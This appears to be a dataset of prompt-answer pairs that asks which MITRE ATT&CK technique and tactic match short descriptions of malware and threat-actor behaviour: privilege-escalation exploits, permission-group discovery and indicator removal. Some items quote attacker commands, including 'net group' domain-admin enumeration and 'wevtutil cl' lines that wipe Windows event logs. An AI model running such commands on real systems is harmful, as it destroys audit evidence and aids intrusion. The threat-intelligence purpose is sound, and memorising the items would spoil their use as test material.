+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.","Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can exploit vulnerabilities such as MS14-058.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can exploit vulnerabilities such as MS16-032 and MS16-135.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has used the BOtB tool which exploits CVE-2019-5736.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ProLock can use CVE-2019-0859 to escalate privileges on a compromised host.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape has leveraged a vulnerability in Windows containers to perform an Escape to Host.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet used MS10-073 and an undisclosed Task Scheduler vulnerability to escalate privileges on local Windows machines.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird exploits CVE-2016-4117 to allow an executable to gain escalated privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET has used a zero-day exploit in the ssh launchdaemon to elevate privileges and bypass SIP.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox has the ability to leverage local and remote exploits to escalate privileges.,"Tecnique: T1068 Exploitation for Privilege Escalation, Tactic: TA0004 Privilege Escalation"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used the `Get-ManagementRoleAssignment` PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.","Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can enumerate the permissions associated with Windows groups.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used net group commands to enumerate various Windows user groups and permissions.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has enumerated all users and roles from a victim's main treasury system.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used TinyMet to enumerate members of privileged groups. TA505 has also run net group /domain.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon uses the net group command.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has the ability to identify Workgroup membership.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP has the capability to retrieve information about groups.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter gathered the local privileges for the infected host.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape checks for Kubernetes node permissions.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can identify the groups the user on a compromised host belongs to.,"Tecnique: T1069 Permission Groups Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used the command `net localgroup ""adminstrator"" ` to identify accounts with local administrator rights.","Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `net group` command as part of their advanced reconnaissance.","Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group.","Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used net localgroup administrators to identify accounts with local administrative rights.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has run `net localgroup` to enumerate local groups.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used net localgroup administrators to find local administrators on compromised systems.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has used the ShowLocalGroupDetails command to identify administrator, user, and guest accounts on a compromised host.","Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used net localgroup and net localgroup Administrators to enumerate group information, including members of the local administrators group.","Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has run `net localgroup administrators` in compromised environments to enumerate accounts.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to list local groups: net localgroup administrator >> %temp%\download,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can collect information about local groups and members.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell can obtain a list of local groups of users from a system.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use net localgroup to list local groups on a system.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary has the capability to execute the command net localgroup administrators.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic gathers information on local group names.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been used to execute the net localgroup administrators command on a targeted system.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy enumerates the privilege level of the victim during the initial infection.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth has checked the local administrators group.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can obtain the permissions of the victim user.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar gathers information about local groups and members.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of users belonging to the local users and administrators groups with the commands net localgroup administrators and net localgroup users.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Commands such as net group and net localgroup can be used in Net to gather information about and manipulate groups.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo has enumerated the local administrators group.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect local group information by running net localgroup administrators or a series of other commands on a victim.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains modules, such as Get-LocAdm for enumerating permission groups.","Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use net localgroup to enable discovery of local groups.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can obtain a list of local groups and members.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sys10 collects the group name of the logged-in user and sends it to the C2.,"Tecnique: T1069.001 Permission Groups Discovery: Local Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors use the command `net group ""domain admins"" /dom` to enumerate domain groups.","Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used AdFind to enumerate domain groups.","Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used batch scripts to enumerate administrators and users in the domain.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used the command `net group ""domain admins"" /domain` to enumerate domain groups.","Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used specific malware modules to gather domain membership.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang performs discovery of permission groups net group /domain.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has used the AD Explorer tool to enumerate groups on a victim's network.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used net group /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to find domain group permission settings.","Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has executed `net group ""domain admins"" /dom` for discovery on compromised machines.","Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used net group ""Domain Admins"" /domain to identify domain administrators.","Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has run `net group` in compromised environments to discover domain groups.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AdFind can enumerate domain groups.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can use `net.exe group ""domain admins"" /domain` to identify Domain Administrators.","Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can determine if a user on a compromised host has domain admin privileges.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can collect information about domain groups and members.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use `net group` for discovery on targeted domains.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can identify targets by querying account groups on a domain contoller.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can gather the user accounts within domain groups.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor can conduct Active Directory reconnaissance using tools such as Sharphound or AdFind.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GRIFFON has used a reconnaissance module that can be used to retrieve Windows domain membership information.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands net group Exchange Trusted Subsystem /domain and net group domain admins /domain.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs collects a list of domain groups with the command net localgroup /domain.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Commands such as net group /domain can be used in Net to gather information about and manipulate groups.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSInfo specifically looks for Domain Admins and power users within the domain.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER may collect domain group information by running net group /domain or a series of other commands on a victim.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can identify the domain membership of a compromised host.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can use `System.DirectoryServices` namespace to retrieve domain group information.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can enumerate domain groups by executing net.exe group /domain.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can identify domain group membership for the current user.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: dsquery can be used to gather information on permission groups within a domain.,"Tecnique: T1069.002 Permission Groups Discovery: Domain Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider accessed Azure AD to download bulk lists of group members and their Active Directory attributes.","Tecnique: T1069.003 Permission Groups Discovery: Cloud Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can enumerate Azure AD groups.,"Tecnique: T1069.003 Permission Groups Discovery: Cloud Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can enumerate IAM permissions.,"Tecnique: T1069.003 Permission Groups Discovery: Cloud Groups, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROADTools can enumerate Azure AD groups.,"Tecnique: T1069.003 Permission Groups Discovery: Cloud Groups, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors cleared logs to remove traces of their activity and restored compromised systems to a clean state to bypass manufacturer mitigations for CVE-2023-46805 and CVE-2024-21887.","Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.","Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used the THINBLOOD utility to clear SSL VPN log files located at `/home/runtime/logs`.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot deletes all artifacts associated with the malware from the infected machine.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has removed the watermark associated with enabling the TESTSIGNING boot configuration option by removing the relevant strings in the user32.dll.mui of the system.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader has the ability to remove values it writes to the Registry.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can uninstall malicious components from the Registry, stop processes, and clear the browser history.","Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can erase file references to payloads in-memory after being reflectively loaded and executed.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM has a function called ""DeleteLeftovers"" to remove certain artifacts of the attack.","Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro can close specific Windows Security and Internet Explorer dialog boxes to mask external connections.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream has the ability to clean traces of malware deployment.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.","Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has a command to delete a Registry key it uses, \Software\Microsoft\Internet Explorer\notes.","Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy` Registry key.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can overwrite Registry settings to reduce its visibility on the victim.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can clear a memory blog in the process by overwriting it with junk bytes.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to clean up and remove data structures from a compromised host.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can remove artifacts from the compromised host, including created Registry keys.","Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST removed HTTP proxy registry values to clean up traces of execution.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to delete created WMI objects to evade detections.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has deleted arbitrary Registry values.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot will delete an associated registry key if a certain server response is received.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet can delete OLE Automation and SQL stored procedures used to store malicious payloads.,"Tecnique: T1070 Indicator Removal, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, the threat actors deleted all Windows system and security event logs using `/Q /c wevtutil cl system` and `/Q /c wevtutil cl security`.","Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has cleared event logs, including by using the commands wevtutil cl System and wevtutil cl Security.","Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has cleared select event log entries.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 clears Window Event logs and Sysmon logs from the system.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has cleared event logs on compromised hosts.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.","Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 has cleared event logs from victims.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has cleared logs during post compromise cleanup activities.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used Cobalt Strike to empty log files.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can clear Windows event logs using `wevtutil.exe`.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The BlackEnergy component KillDisk is capable of deleting Windows Event Logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher clears the system event logs using OpenEventLog/ClearEventLog APIs .,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can overwrite the `C:\Windows\System32\winevt\Logs` file on a targeted system.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard has the ability to use `wevtutil cl system` to clear event logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can clear all system event logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk deletes Application, Security, Setup, and System Windows Event Logs.","Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can clear and remove event logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can delete Windows Event logs by invoking the `OpenEventLogW` and `ClearEventLogW` functions.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can use Wevtutil to remove Security, System and Application Event Viewer logs.","Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya uses wevtutil to clear the Windows event logs.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer will attempt to clear the System and Security event logs using wevtutil.,"Tecnique: T1070.001 Indicator Removal: Clear Windows Event Logs, Tactic: TA0005 Defense Evasion"
